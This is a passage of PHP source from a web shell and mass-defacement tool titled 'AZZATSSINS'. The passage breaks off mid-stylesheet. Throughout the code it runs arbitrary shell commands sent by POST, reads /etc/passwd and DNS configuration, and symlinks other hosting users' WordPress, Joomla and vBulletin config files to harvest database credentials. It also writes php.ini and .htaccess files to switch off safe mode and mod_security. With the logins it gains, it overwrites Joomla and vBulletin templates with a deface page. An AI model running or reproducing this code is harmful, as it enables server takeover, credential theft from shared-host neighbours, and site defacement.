  911.  
  912. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
  913.  
  914. $hash = $dhash[1];
  915.  
  916. $postme = "username=admin&passwd=".$npass."&usrname=admin&lang=en-GB&pass=".$npass."&submit=Login&option=com_login&task=login&".$hash."=1";
  917.  
  918. $url = $site_url ."index.php";
  919.  
  920. $logginin = GetPage($url,$cookie,$postme);
  921.  
  922. if(preg_match('%logout|index2\.php%',$logginin)){
  923.  
  924. $logged_in = true;
  925.  
  926. }
  927.  
  928. if(!$logged_in){
  929.  
  930. file_put_contents("jm_login1.5".md5($site_url).".txt",$site_url.$logginin);
  931.  
  932. throwErr("Login Error");
  933.  
  934. }
  935.  
  936. if($logged_in){
  937.  
  938. joomlaCom($site_url,$cookie,$site);
  939.  
  940. if(preg_match('%index2\.php%',$logginin)){
  941.  
  942. $url = $site_url ."index2.php";
  943.  
  944. $logginin = GetPage($url,$cookie);
  945.  
  946. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
  947.  
  948. $hash = $dhash[1];
  949.  
  950. $url = $site_url ."/index2.php";
  951.  
  952. $postme = "doPreview=on&cid%5B%5D=".$template_name."&limit=30&limitstart=0&option=com_templates&task=edit_source&boxchecked=1&hidemainmenu=1&client=0&".$hash."=1";
  953.  
  954. $themepage = GetPage($url,$cookie,$postme);
  955.  
  956. if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
  957.  
  958. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
  959.  
  960. $hash = $dhash[1];
  961.  
  962. $url=$site_url."/index2.php";
  963.  
  964. $postme = "filecontent=".urlencode($html)."&template=".$template_name."&option=com_templates&task=save_source&client=0&".$hash."=1";
  965.  
  966. $themeedit = GetPage($url,$cookie,$postme);
  967.  
  968. if(preg_match('%Template Manager%',$themeedit)){
  969.  
  970. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
  971.  
  972. add2file("jm_index.txt",$site.Chr(10));
  973.  
  974. $status['site'] = $site;
  975.  
  976. $status['status'] = "success";
  977.  
  978. die(json_encode($status));
  979.  
  980. }
  981.  
  982. else{
  983.  
  984. file_put_contents("jmupd.txt",$site_url.$themeedit);
  985.  
  986. throwErr($template_name);
  987.  
  988. }
  989.  
  990. }else{
  991.  
  992. throwErr("Index not found");
  993.  
  994. }
  995.  
  996. }
  997.  
  998. else{
  999.  
  1000. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
  1001.  
  1002. $hash = $dhash[1];
  1003.  
  1004. $url = $site_url ."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name."&".$hash."=1";
  1005.  
  1006. $themepage = GetPage($url,$cookie);
  1007.  
  1008. if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
  1009.  
  1010. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
  1011.  
  1012. $hash = $dhash[1];
  1013.  
  1014. $url=$site_url."/index.php?option=com_templates&layout=edit";
  1015.  
  1016. $postme = "filecontent=".urlencode($html)."&id=".$template_name."&cid[]=".$template_name."&".$hash."=1&task=save_source&client=0";
  1017.  
  1018. $themeedit = GetPage($url,$cookie,$postme);
  1019.  
  1020. if(preg_match('%class=\"message message fade\"%',$themeedit)){
  1021.  
  1022. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
  1023.  
  1024. add2file("jm_index.txt",$site.Chr(10));
  1025.  
  1026. $status['site'] = $site;
  1027.  
  1028. $status['status'] = "success";
  1029.  
  1030. die(json_encode($status));
  1031.  
  1032. }
  1033.  
  1034. else{
  1035.  
  1036. file_put_contents("jmupd.txt",$site_url.$themeedit);
  1037.  
  1038. throwErr($template_name);
  1039.  
  1040. }
  1041.  
  1042. }else{
  1043.  
  1044. throwErr("Index not found");
  1045.  
  1046. }
  1047.  
  1048. }
  1049.  
  1050. }
  1051.  
  1052. }
  1053.  
  1054. }
  1055.  
  1056. else{
  1057.  
  1058. throwErr("Mysql Fail");
  1059.  
  1060. }
  1061.  
  1062. }
  1063.  
  1064. else{
  1065.  
  1066. throwErr("Config not found");
  1067.  
  1068. }
  1069.  
  1070. }
  1071.  
  1072. function doXploitVB($cnf,$html){
  1073.  
  1074. $str = file_get_contents($cnf);
  1075.  
  1076. if(preg_match('%vBulletin%',$str)){
  1077.  
  1078. $username=EloFind($str,"\$config['MasterServer']['username'] = '","'");
  1079.  
  1080. $password=EloFind($str,"\$config['MasterServer']['password'] = '","'");
  1081.  
  1082. $dbname=EloFind($str,"\$config['Database']['dbname'] = '","'");
  1083.  
  1084. $prefix=EloFind($str,"\$config['Database']['tableprefix'] = '","'");
  1085.  
  1086. $link=mysql_connect("localhost",$username,$password) ;
  1087.  
  1088. if ($link) {
  1089.  
  1090. mysql_select_db($dbname,$link);
  1091.  
  1092. $html = str_replace('"','\\\"',$html);
  1093.  
  1094. $query = "UPDATE template SET template = '".$html."'";
  1095.  
  1096. $result =@ mysql_query($query);
  1097.  
  1098. if($result){
  1099.  
  1100. $query = "SELECT * FROM `datastore` WHERE title = 'options'";
  1101.  
  1102. $result =@ mysql_query($query);
  1103.  
  1104. $data = mysql_fetch_array($result);
  1105.  
  1106. $optionz=$data["data"];
  1107.  
  1108. $site_url = EloFind($optionz,'"bburl";s:34:"','"');
  1109.  
  1110. $status['site'] = $site_url;
  1111.  
  1112. $status['status'] = "success";
  1113.  
  1114. die(json_encode($status));
  1115.  
  1116. }else{
  1117.  
  1118. throwErr("Update Failed");
  1119.  
  1120. }
  1121.  
  1122. }else{
  1123.  
  1124. throwErr("Mysql Fail");
  1125.  
  1126. }
  1127.  
  1128. }else{
  1129.  
  1130. throwErr("Config not found");
  1131.  
  1132. }
  1133.  
  1134. }
  1135.  
  1136. function exme($in) {
  1137.  
  1138. $out = '';
  1139.  
  1140. if (function_exists('exec')) {
  1141.  
  1142. @exec($in,$out);
  1143.  
  1144. $out = @join("</br>",$out);
  1145.  
  1146. }elseif (function_exists('passthru')) {
  1147.  
  1148. ob_start();
  1149.  
  1150. @passthru($in);
  1151.  
  1152. $out = ob_get_clean();
  1153.  
  1154. }elseif (function_exists('system')) {
  1155.  
  1156. ob_start();
  1157.  
  1158. @system($in);
  1159.  
  1160. $out = ob_get_clean();
  1161.  
  1162. }elseif (function_exists('shell_exec')) {
  1163.  
  1164. $out = shell_exec($in);
  1165.  
  1166. }elseif (is_resource($f = @popen($in,"r"))) {
  1167.  
  1168. $out = "";
  1169.  
  1170. while(!@feof($f))
  1171.  
  1172. $out .= fread($f,1024);
  1173.  
  1174. pclose($f);
  1175.  
  1176. }
  1177.  
  1178. return $out;
  1179.  
  1180. }
  1181.  
  1182. if($_POST['ac'] == "secinfo"){
  1183.  
  1184. if(is_readable("/etc/named.conf")){
  1185.  
  1186. echo '&raquo; /etc/named.conf is readable.<br />';
  1187.  
  1188. }else{
  1189.  
  1190. echo '&raquo; <font color="red">/etc/named.conf not readable</font> <br />';
  1191.  
  1192. }
  1193.  
  1194. if(is_readable("/etc/passwd")){
  1195.  
  1196. echo '&raquo; /etc/passwd is readable.<br />';
  1197.  
  1198. }else{
  1199.  
  1200. echo '&raquo; <font color="red">/etc/passwd not readable</font> <br />';
  1201.  
  1202. }
  1203.  
  1204. if(is_readable("/etc/valiases")){
  1205.  
  1206. echo '&raquo; /etc/valiases exists';
  1207.  
  1208. if(is_array(scandir("/etc/valiases"))){
  1209.  
  1210. echo ' & scanable';
  1211.  
  1212. }
  1213.  
  1214. echo '.<br />';
  1215.  
  1216. }else{
  1217.  
  1218. echo '&raquo; <font color="red">/etc/valiases not readable</font> <br />';
  1219.  
  1220. }
  1221.  
  1222. if(is_readable("/var/named")){
  1223.  
  1224. echo '&raquo; /var/named exists';
  1225.  
  1226. if(is_array(scandir("/var/named"))){
  1227.  
  1228. echo ' & scanable';
  1229.  
  1230. }
  1231.  
  1232. echo '.<br />';
  1233.  
  1234. }else{
  1235.  
  1236. echo '&raquo; <font color="red">/var/named not readable</font> <br />';
  1237.  
  1238. }
  1239.  
  1240. if(ini_get('disable_functions')){
  1241.  
  1242. echo '&raquo; '.ini_get('disable_functions').' are disabled<br />';
  1243.  
  1244. }
  1245.  
  1246. if(function_exists("symlink")){
  1247.  
  1248. echo '&raquo; Symlinking allowed<br />';
  1249.  
  1250. }else{
  1251.  
  1252. echo '&raquo; <font color="red">Symlinking not allowed</font> <br />';
  1253.  
  1254. }
  1255.  
  1256. if(is_writable("/var/tmp")){
  1257.  
  1258. echo '&raquo; /var/tmp folder is writable<br />';
  1259.  
  1260. }
  1261.  
  1262. if(is_readable('/var/log')){
  1263.  
  1264. echo '&raquo; /var/log folder is readable<br />';
  1265.  
  1266. }
  1267.  
  1268. die();
  1269.  
  1270. }
  1271.  
  1272. elseif($_POST['ac'] == "sysinfo"){
  1273.  
  1274. echo "<span style='color:red;'><strong>System:</strong></span> ".php_uname()."<br />";
  1275.  
  1276. echo "<span style='color:red;'><strong>WebServer:</strong></span> ".$_SERVER['SERVER_SOFTWARE']."<br />";
  1277.  
  1278. echo "<span style='color:red;'><strong>PHP version:</strong></span> ".phpversion()." on ".php_sapi_name()."<br />";
  1279.  
  1280. $ssys = "None";
  1281.  
  1282. if(is_dir("/usr/local/cpanel")){
  1283.  
  1284. $ssys = "Running On Cpanel";
  1285.  
  1286. }elseif(is_dir("/usr/local/directadmin")){
  1287.  
  1288. $ssys = "Running On Directadmin";
  1289.  
  1290. }
  1291.  
  1292. echo "<span style='color:red;'><strong>Server System:</strong></span> ".$ssys."<br />";
  1293.  
  1294. if(function_exists("disk_total_space")){
  1295.  
  1296. echo "<span style='color:red;'><strong>Free Disk:</strong></span> ".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."<br />";
  1297.  
  1298. }
  1299.  
  1300. echo "<span style='color:red;'><strong>Server IP:</strong></span> ".$_SERVER["SERVER_ADDR"]."<br />";
  1301.  
  1302. die();
  1303.  
  1304. }
  1305.  
  1306. elseif($_POST['ac'] == "browse"){
  1307.  
  1308. error_reporting(0);
  1309.  
  1310. if($_POST['path'] != ""){
  1311.  
  1312. $path = $_POST['path'];
  1313.  
  1314. }else{
  1315.  
  1316. $path = getcwd();
  1317.  
  1318. }
  1319.  
  1320. $filez = scandir($path);
  1321.  
  1322. $q = 2;
  1323.  
  1324. foreach($filez as $mfile){
  1325.  
  1326. if($q == 2){$q = 1;}else{$q = 2;}
  1327.  
  1328. $npath = $_POST['path'].$mfile;
  1329.  
  1330. $stat = stat($npath);
  1331.  
  1332. $usr = posix_getpwuid($stat['uid']);
  1333.  
  1334. $grp = posix_getpwuid($stat['gid']);
  1335.  
  1336. if(is_dir($npath)){
  1337.  
  1338. $size = "Dir";
  1339.  
  1340. }else{
  1341.  
  1342. $size = convertByte($stat['size']);
  1343.  
  1344. }
  1345.  
  1346. $fperm = substr(sprintf('%o',fileperms($npath)),-4);
  1347.  
  1348. if(!$fperm){
  1349.  
  1350. $fperm = "<font color='red'>Restricted</font>";
  1351.  
  1352. }elseif(is_writeable($npath)){
  1353.  
  1354. $fperm = "<font color='#28FE14'>".$fperm."</font>";
  1355.  
  1356. }elseif(is_readable($npath)){
  1357.  
  1358. $fperm = "<font color='yellow'>".$fperm."</font>";
  1359.  
  1360. }
  1361.  
  1362. echo '<div class="filetable">
  1363.  
  1364. <div class="tblbx'.$q.'" style="width:220px;text-align:left;"><a href="" onClick="filebrs(\''.$npath.'/\'); return false;">'.$mfile.'</a></div>
  1365.  
  1366. <div class="tblbx'.$q.'" style="width:80px;">'.$size.'</div>
  1367.  
  1368. <div class="tblbx'.$q.'" style="width:100px;">Modify</div>
  1369.  
  1370. <div class="tblbx'.$q.'" style="width:100px;">'.$usr['name']."/".$grp['name'].'</div>
  1371.  
  1372. <div class="tblbx'.$q.'" style="width:100px;">'.$fperm.'</div>
  1373.  
  1374. <div class="tblbx'.$q.'" style="width:80px;">Action</div>
  1375.  
  1376. </div>';
  1377.  
  1378. }
  1379.  
  1380. die();
  1381.  
  1382. }
  1383.  
  1384. elseif($_POST['ac'] == "chknamed"){
  1385.  
  1386. error_reporting(0);
  1387.  
  1388. if(is_readable("/etc/named.conf")){
  1389.  
  1390. $named = file_get_contents("/etc/named.conf");
  1391.  
  1392. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
  1393.  
  1394. foreach($domains[1] as $domain){
  1395.  
  1396. $domain = trim($domain);
  1397.  
  1398. $i += 1;
  1399.  
  1400. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1401.  
  1402. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
  1403.  
  1404. }
  1405.  
  1406. echo "Total Domains Found: ".$i."<br />".$dn;
  1407.  
  1408. die();
  1409.  
  1410. }
  1411.  
  1412. elseif(is_readable("/etc/valiases")){
  1413.  
  1414. $list = scandir("/etc/valiases");
  1415.  
  1416. foreach($list as $domain){
  1417.  
  1418. $i += 1;
  1419.  
  1420. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1421.  
  1422. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
  1423.  
  1424. }
  1425.  
  1426. echo "Total Domains Found: ".$i."<br />".$dn;
  1427.  
  1428. die();
  1429.  
  1430. }
  1431.  
  1432. elseif(is_readable("/var/named")){
  1433.  
  1434. $list = scandir("/var/named");
  1435.  
  1436. foreach($list as $domain){
  1437.  
  1438. if(strpos($domain,".db")){
  1439.  
  1440. $i += 1;
  1441.  
  1442. $domain = str_replace('.db','',$domain);
  1443.  
  1444. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1445.  
  1446. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
  1447.  
  1448. }
  1449.  
  1450. }
  1451.  
  1452. echo "Total Domains Found: ".$i."<br />".$dn;
  1453.  
  1454. die();
  1455.  
  1456. }
  1457.  
  1458. else{
  1459.  
  1460. die("'/etc/named.conf' is not readable. Try scan for public_html. (:");
  1461.  
  1462. }
  1463.  
  1464. }
  1465.  
  1466. elseif($_POST['ac'] == "safebypass"){
  1467.  
  1468. $byphp = "safe_mode = Off
  1469.  
  1470. disable_functions =
  1471.  
  1472. safe_mode_gid = OFF
  1473.  
  1474. open_basedir = OFF
  1475.  
  1476. allow_url_fopen = On";
  1477.  
  1478. $byht = "<IfModule mod_security.c>
  1479.  
  1480. SecFilterEngine Off
  1481.  
  1482. SecFilterScanPOST Off
  1483.  
  1484. SecFilterCheckURLEncoding Off
  1485.  
  1486. SecFilterCheckUnicodeEncoding Off
  1487.  
  1488. </IfModule>";
  1489.  
  1490. file_put_contents("php.ini",$byphp);
  1491.  
  1492. file_put_contents(".htaccess",$byht);
  1493.  
  1494. echo "<script>alert('Safe Mode ByPassed'); hideAll();</script>";
  1495.  
  1496. die();
  1497.  
  1498. }
  1499.  
  1500. elseif($_POST['ac'] == "chkph"){
  1501.  
  1502. if(is_readable("/etc/passwd")){
  1503.  
  1504. if(!is_dir("XAZZATSSINSX")){
  1505.  
  1506. @mkdir('XAZZATSSINSX',0777);
  1507.  
  1508. }
  1509.  
  1510. $htaccss = "Options all
  1511.  
  1512. DirectoryIndex Sux.html
  1513.  
  1514. AddType text/plain .php
  1515.  
  1516. AddHandler server-parsed .php
  1517.  
  1518.  AddType text/plain .html
  1519.  
  1520. AddHandler txt .html
  1521.  
  1522. Require None
  1523.  
  1524. Satisfy Any";
  1525.  
  1526. file_put_contents("XAZZATSSINSX/.htaccess",$htaccss);
  1527.  
  1528. $etc = file_get_contents("/etc/passwd");
  1529.  
  1530. $etcz = explode("\n",$etc);
  1531.  
  1532. foreach($etcz as $etz){
  1533.  
  1534. $etcc = explode(":",$etz);
  1535.  
  1536. error_reporting(0);
  1537.  
  1538. if($enable_wp){
  1539.  
  1540. symlink('/home/'.$etcc[0].'/public_html/wp-config.php',"XAZZATSSINSX/".$etcc[0].'-WordPress.txt');
  1541.  
  1542. symlink('/home/'.$etcc[0].'/public_html/blog/wp-config.php',"XAZZATSSINSX/".$etcc[0].'-WordPress.txt');
  1543.  
  1544. symlink('/home/'.$etcc[0].'/public_html/wp/wp-config.php',"XAZZATSSINSX/".$etcc[0].'-WordPress.txt');
  1545.  
  1546. }
  1547.  
  1548. if($enable_phpbb){
  1549.  
  1550. symlink('/home/'.$etcc[0].'/public_html/config.php',"XAZZATSSINSX/".$etcc[0].'-PhpBB.txt');
  1551.  
  1552. }
  1553.  
  1554. if($enable_vb){
  1555.  
  1556. symlink('/home/'.$etcc[0].'/public_html/includes/config.php',"XAZZATSSINSX/".$etcc[0].'-vBulletin.txt');
  1557.  
  1558. }
  1559.  
  1560. if($enable_joomla){
  1561.  
  1562. symlink('/home/'.$etcc[0].'/public_html/configuration.php',"XAZZATSSINSX/".$etcc[0].'-Joomla.txt');
  1563.  
  1564. symlink('/home/'.$etcc[0].'/public_html/web/configuration.php',"XAZZATSSINSX/".$etcc[0].'-Joomla.txt');
  1565.  
  1566. symlink('/home/'.$etcc[0].'/public_html/site/configuration.php',"XAZZATSSINSX/".$etcc[0].'-Joomla.txt');
  1567.  
  1568. }
  1569.  
  1570. }
  1571.  
  1572. $lol = explode("/",curPageURL());
  1573.  
  1574. $link = str_replace(end($lol),"",curPageURL());
  1575.  
  1576. $str = file_get_contents($link."/XAZZATSSINSX");
  1577.  
  1578. preg_match_all('%\w \w{4}=(\"|\')(.*)\.txt(\"|\')%',$str,$exp);
  1579.  
  1580. if(is_array($exp[2])){
  1581.  
  1582. $q = 2;
  1583.  
  1584. $dmn = getDnamed();
  1585.  
  1586. foreach($exp[2] as $sitez){
  1587.  
  1588. if($q == 2){$q = 1;}else{$q = 2;}
  1589.  
  1590. $j += 1;
  1591.  
  1592. $sn = explode("-",$sitez);
  1593.  
  1594. $domain = $dmn[$sn[0]];
  1595.  
  1596. if($domain){
  1597.  
  1598. $domain = "<a id='inj_dom".$j."' href='http://".$domain."'>".$domain."</a>";
  1599.  
  1600. }else{
  1601.  
  1602. $domain = "<a id='inj_dom".$j."' href=''>...</a>";
  1603.  
  1604. }
  1605.  
  1606. $nan .= '<div id="inj'.$j.'">
  1607.  
  1608. <div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$j.'"onClick="doToggle(\''.$j.'\');">'.$sn[0].'<input style="display:none;" type="checkbox" id="injchk'.$j.'" checked></div>
  1609.  
  1610. <div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$j.'">'.$domain.'</div>
  1611.  
  1612. <div class="tblbx'.$q.'" style="width:160px;"><a id="injst'.$j.'" class="conf" href="'.$link.'XAZZATSSINSX/'.$sitez.'.txt" title="'.$j.'">'.ucfirst($sn[1]).'</a></div>
  1613.  
  1614. <div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$j.'" title="On Idle...">Idle...</div>
  1615.  
  1616. </div>';
  1617.  
  1618. }
  1619.  
  1620. $cnt = '<input type="text" style="display:none" id="sitecount" value="'.$j.'">';
  1621.  
  1622. echo $nan.$cnt;
  1623.  
  1624. }
  1625.  
  1626. }
  1627.  
  1628. die();
  1629.  
  1630. }
  1631.  
  1632. elseif($_POST['ac'] == "chkph2"){
  1633.  
  1634. if(is_readable("/etc/passwd")){
  1635.  
  1636. if(!is_dir("XAZZATSSINSX")){
  1637.  
  1638. @mkdir('XAZZATSSINSX',0777);
  1639.  
  1640. }
  1641.  
  1642. if(!is_link("XAZZATSSINSX/root")){
  1643.  
  1644. $sym = symlink("/","XAZZATSSINSX/root");
  1645.  
  1646. if(!$sym){
  1647.  
  1648. die("Symlink method failed.");
  1649.  
  1650. }
  1651.  
  1652. }
  1653.  
  1654. $htaccss = "Options all
  1655.  
  1656. DirectoryIndex Sux.html
  1657.  
  1658. AddType text/plain .php
  1659.  
  1660. AddHandler server-parsed .php
  1661.  
  1662.  AddType text/plain .html
  1663.  
  1664. AddHandler txt .html
  1665.  
  1666. Require None
  1667.  
  1668. Satisfy Any";
  1669.  
  1670. file_put_contents("XAZZATSSINSX/.htaccess",$htaccss);
  1671.  
  1672. $etc = file_get_contents("/etc/passwd");
  1673.  
  1674. $etcz = explode("\n",$etc);
  1675.  
  1676. $lol = explode("/",curPageURL());
  1677.  
  1678. $link = str_replace(end($lol),"",curPageURL());
  1679.  
  1680. @unlink("rootinject.tmp");
  1681.  
  1682. $q = 2;
  1683.  
  1684. $dmn = getDnamed();
  1685.  
  1686. foreach($etcz as $etz){
  1687.  
  1688. $etcc = explode(":",$etz);
  1689.  
  1690. $dr = "XAZZATSSINSX/root/home/".$etcc[0]."/public_html/";
  1691.  
  1692. $dan = chkSys($link.$dr);
  1693.  
  1694. if($dan){
  1695.  
  1696. if($q == 2){$q = 1;}else{$q = 2;}
  1697.  
  1698. $domain = $dmn[$etcc[0]];
  1699.  
  1700. if($domain){
  1701.  
  1702. $domain = "<a id='inj_dom".$k."' href='http://".$domain."'>".$domain."</a>";
  1703.  
  1704. }else{
  1705.  
  1706. $domain = "<a id='inj_dom".$k."' href=''>...</a>";
  1707.  
  1708. }
  1709.  
  1710. $k += 1;
  1711.  
  1712. $nant = '<div id="inj'.$k.'">
  1713.  
  1714. <div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$k.'"onClick="doToggle(\''.$k.'\');">'.$etcc[0].'<input style="display:none;" type="checkbox" id="injchk'.$k.'" checked></div>
  1715.  
  1716. <div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$k.'">'.$domain.'</div>
  1717.  
  1718. <div class="tblbx'.$q.'" style="width:160px;"><a class="conf" href="'.$dan['link'].'">'.$dan['cms'].'</a></div>
  1719.  
  1720. <div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$k.'">Idle...</div>
  1721.  
  1722. </div>';
  1723.  
  1724. file_put_contents("rootinject.tmp",$nant,FILE_APPEND);
  1725.  
  1726. $nan .= $nant;
  1727.  
  1728. }
  1729.  
  1730. }
  1731.  
  1732. $cnt = '<input type="text" style="display:none" id="sitecount" value="'.$k.'">';
  1733.  
  1734. echo $nan.$cnt;
  1735.  
  1736. }
  1737.  
  1738. die();
  1739.  
  1740. }
  1741.  
  1742. elseif($_POST['ac'] == "inject"){
  1743.  
  1744. error_reporting(0);
  1745.  
  1746. $cms = strtolower($_POST['cms']);
  1747.  
  1748. $cnf = $_POST['conf'];
  1749.  
  1750. if(file_exists(md5($_POST['deface_page']))){
  1751.  
  1752. $html = file_get_contents(md5($_POST['deface_page']));
  1753.  
  1754. }else{
  1755.  
  1756. $html = file_get_contents($_POST['deface_page']);
  1757.  
  1758. file_put_contents(md5($_POST['deface_page']),$html);
  1759.  
  1760. file_put_contents("azzatssins.html",$html);
  1761.  
  1762. }
  1763.  
  1764. if(!is_dir("cookie")){
  1765.  
  1766. @mkdir("cookie",0777);
  1767.  
  1768. }
  1769.  
  1770. switch($cms){
  1771.  
  1772. case "wordpress":
  1773.  
  1774. doXploitWP($cnf,$html,"uradhura123");
  1775.  
  1776. break;
  1777.  
  1778. case "joomla":
  1779.  
  1780. doXploitJM($cnf,$html,"uradhura123");
  1781.  
  1782. break;
  1783.  
  1784. case "vbulletin":
  1785.  
  1786. doXploitVB($cnf,$html);
  1787.  
  1788. break;
  1789.  
  1790. case "phpbb":
  1791.  
  1792. break;
  1793.  
  1794. case "ipb":
  1795.  
  1796. break;
  1797.  
  1798. case "mybb":
  1799.  
  1800. break;
  1801.  
  1802. case "oscommerce":
  1803.  
  1804. break;
  1805.  
  1806. case "smf":
  1807.  
  1808. break;
  1809.  
  1810. case "drupal":
  1811.  
  1812. break;
  1813.  
  1814. case "seditio":
  1815.  
  1816. break;
  1817.  
  1818. case "e107":
  1819.  
  1820. break;
  1821.  
  1822. }
  1823.  
  1824. throwErr("Not Added");
  1825.  
  1826. }
  1827.  
  1828. elseif($_POST['ac'] == "ssh"){
  1829.  
  1830. $ssh = exme($_POST['command']);
  1831.  
  1832. die(nl2br($ssh));
  1833.  
  1834. }
  1835.  
  1836. elseif($_POST['ac'] == "phpinfo"){
  1837.  
  1838. $php = phpinfo();
  1839.  
  1840. die($php);
  1841.  
  1842. }
  1843.  
  1844. ;echo '<html>
  1845.  
  1846. <title>.: !- AZZATSSINS -! :.</title>
  1847.  
  1848. <head>
  1849.  
  1850. <script src="http://code.jquery.com/jquery-latest.min.js"></script>
  1851.  
  1852. </head>
  1853.  
  1854. <body bgcolor="black" background="http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG">
  1855.  
  1856. <style>
  1857.  
  1858. body{
  1859.  
  1860. font-family: "courier new";
  1861.  
  1862. background-color: black;
  1863.  
  1864. font-size:80%;
  1865.  
  1866. color: #28FE14;
  1867.  
  1868. background-image: url("http://i.imgur.com/zHNCk2e.gif");
  1869.  
  1870. }
  1871.  
  1872. #sysinfo{
  1873.  
  1874. border: 1px solid #28FE14;
  1875.  
  1876. position:fixed;
  1877.  
  1878. padding:2px;
  1879.  
  1880. top:1px;
  1881.  
  1882. left:1px;
  1883.  
  1884. background-color: black;
  1885.  
  1886. font-size:12px;
  1887.  
  1888. }
  1889.  
  1890. #phpinfo{
  1891.  
  1892. border: 1px solid #28FE14;
  1893.  
  1894. position:fixed;
  1895.  
  1896. padding:2px;
  1897.  
  1898. top:1px;
  1899.  
  1900. right:1px;
  1901.  
  1902. background-color: black;
  1903.  
  1904. font-size:12px;
  1905.  
  1906. }
  1907.  
  1908. #status{
  1909.  
  1910. border: 1px solid #28FE14;
  1911.  
  1912. position:fixed;
  1913.  
  1914. padding:2px;
  1915.  
  1916. bottom:1px;
  1917.  
  1918. right:1px;
  1919.  
  1920. background-color: black;
  1921.  
  1922. font-size:12px;
  1923.  
  1924. }
  1925.  
  1926. #infobox{
  1927.  
  1928. z-index:1;
  1929.  
  1930. border: 1px solid white;
  1931.  
  1932. margin-left:auto;
  1933.  
  1934. margin-right:auto;
  1935.  
  1936. margin-top:50px;
  1937.  
  1938. width:600px;
  1939.  
  1940. background-color: black;
  1941.  
  1942. font-size:12px;
  1943.  
  1944. }
  1945.  
  1946. .infotitle{
  1947.  
  1948. padding:4px;
  1949.  
  1950. background-color: white;
  1951.  
  1952. color: black;
  1953.  
  1954. font-family: Thaoma;
  1955.  
  1956. font-size:14px;
  1957.  
  1958. }
  1959.  
  1960. .infotxt{
  1961.  
  1962. padding:5px;
  1963.  
  1964. }
  1965.  
  1966.  
  1967.  
  1968. .sidebar{
  1969.  
  1970. position:fixed;
  1971.  
  1972. left:1px;
  1973.  
  1974. top:30%;
  1975.  
  1976. }
  1977.  
  1978. .stitle{
  1979.  
  1980. float:left;
  1981.  
  1982. cursor:pointer;
  1983.  
  1984. padding:7px;
  1985.  
  1986. color:black;
  1987.  
  1988. background-color: white;
  1989.  
  1990. }
  1991.  
  1992. .stitle:hover{
  1993.  
  1994. color:red;
  1995.  
  1996. }
  1997.  
  1998. .smnu{
  1999.  
  2000. display:none;
  2001.  
  2002. background-color: black;
  2003.  
  2004. padding:5px;
  2005.  
  2006. border: 1px solid white;
  2007.  
  2008. float:left;
  2009.  
  2010. }
  2011.  
  2012. a{
  2013.  
  2014. color: #df5;
  2015.  
  2016. text-decoration: none;
  2017.  
  2018. }
  2019.  
  2020. a:hover{
  2021.  
  2022. color:white;
  2023.  
  2024. }
  2025.  
  2026. .copyright{
  2027.  
  2028. position:fixed;
  2029.  
  2030. bottom:1px;
  2031.  
  2032. left:1px;
  2033.  
  2034. padding:2px;
  2035.  
  2036. }
  2037.  
  2038. .logo{
  2039.  
  2040. margin:auto;
  2041.  
  2042. width:600px;
  2043.  
  2044. height:600px;
  2045.  
  2046. background-image: url("");
  2047.  
  2048. }
  2049.  
  2050. .filetable{
  2051.  
  2052. margin-top:2px;
  2053.  
  2054. width:740px;
  2055.  
  2056. }
  2057.  
  2058. .tblcnt{
  2059.  
  2060. text-align: center;
  2061.  
  2062. margin-left:2px;
  2063.  
  2064. color:black;
  2065.  
  2066. background-color: white;
  2067.  
  2068. padding:3px;
  2069.  
  2070. float:left;
  2071.  
  2072. border: 1px solid white;
  2073.  
  2074. }
  2075.  
  2076. .tblbx1{
  2077.  
  2078. height:12px;
  2079.  
  2080. text-align: center;
  2081.  
  2082. margin-left:2px;
  2083.  
  2084. color:white;
  2085.  
  2086. background-color: orange;
  2087.  
  2088. padding:3px;
  2089.  
  2090. float:left;
  2091.  
  2092. border: 1px solid orange;
  2093.  
  2094. }
  2095.  
  2096. .tblbx2{
  2097.  
  2098. height:12px;
  2099.  
  2100. text-align: center;
  2101.  
  2102. margin-left:2px;
  2103.  
  2104. color:white;
  2105.  
  2106. background-color: #444444;
  2107.  
  2108. padding:3px;
  2109.  
  2110. float:left;
  2111.  
  2112. border: 1px solid #444444;
  2113.  
  2114. }
  2115.  
  2116.  
  2117.  
  2118. .tbl{
  2119.  
  2120. margin-top:100px;
  2121.  
  2122. padding-top:2px;
  2123.  
  2124. padding-bottom: 2px;
  2125.  
  2126. margin:auto;
  2127.  
  2128. width:742px;
  2129.  
  2130. border: 1px solid white;
  2131.  
  2132. }
  2133.  
  2134. .rbox{
  2135.  
  2136. float:left;
  2137.  
  2138. border: 1px solid #28FE14;
  2139.  
  2140. padding:10px;
  2141.  
  2142. }
  2143.  
  2144. .smit{
  2145.  
  2146. background-color: black;
  2147.  
  2148. color: #28FE14;
  2149.  
  2150. }
  2151.  
  2152. .sshbox{
  2153.  
  2154. display:none;
  2155.  
  2156. padding-left:7px;
  2157.  
  2158. width:600px;
  2159.  
  2160. height:400px;
  2161.  
  2162. margin: auto;
